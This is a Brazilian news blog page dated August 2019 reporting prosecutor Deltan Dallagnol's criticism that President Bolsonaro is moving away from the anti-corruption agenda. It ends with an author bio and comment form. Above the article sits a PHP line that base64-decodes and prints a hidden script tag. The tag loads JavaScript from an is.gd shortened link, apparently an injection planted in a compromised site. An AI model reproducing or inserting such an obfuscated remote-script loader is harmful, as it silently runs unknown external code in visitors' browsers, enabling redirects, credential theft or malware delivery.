$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deltan Dallagnol diz que Bolsonaro se distancia da agenda anticorrupção

Deltan Dallagnol diz que Bolsonaro se distancia da agenda anticorrupção
24 Ago 2019

coordenador da força-tarefa no Ministério Público Federal (MPF) do Paraná, procurador Deltan Dallagnol, afirmou, em entrevista publicada nesta sexta-feira (23) pelo jornal Gazeta do Povo, que o presidente Jair Bolsonaro (PSL) está se distanciando da pauta anticorrupção. 

Segundo Dallagnol, o chefe do Executivo tem enfraquecido as pautas do ministro da Justiça, Sérgio Moro. “O presidente Jair Bolsonaro, ao longo da campanha eleitoral, se apropriou de uma pauta anticorrupção. Agora, o que nós vemos é que ele vem se distanciando desta pauta de corrupção quando coloca em segundo plano o projeto anticrime.

Ele coloca em segundo plano essa pauta quando faz mudanças no Coaf e desprestigia o auditor da Receita Federal Roberto Leonel [indicado por Moro para o Coaf], que trabalhou na Lava-Jato”, disse. O procurador também fez críticas às interferências do presidente na Receita e Polícia Federal. “Nós vemos também que essas investigações relativas à família dele [Bolsonaro] têm relação com áreas em que ele tem buscado atuar – segundo várias pessoas têm avaliado, de modo indevido – em relação à Receita Federal ou à Polícia Federal. O que nós podemos esperar é que exista uma atuação do presidente coerente com aquilo que ele divulgou em campanha, com a pauta que ele abraçou, que é a pauta anticorrupção”, afirmou. 

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *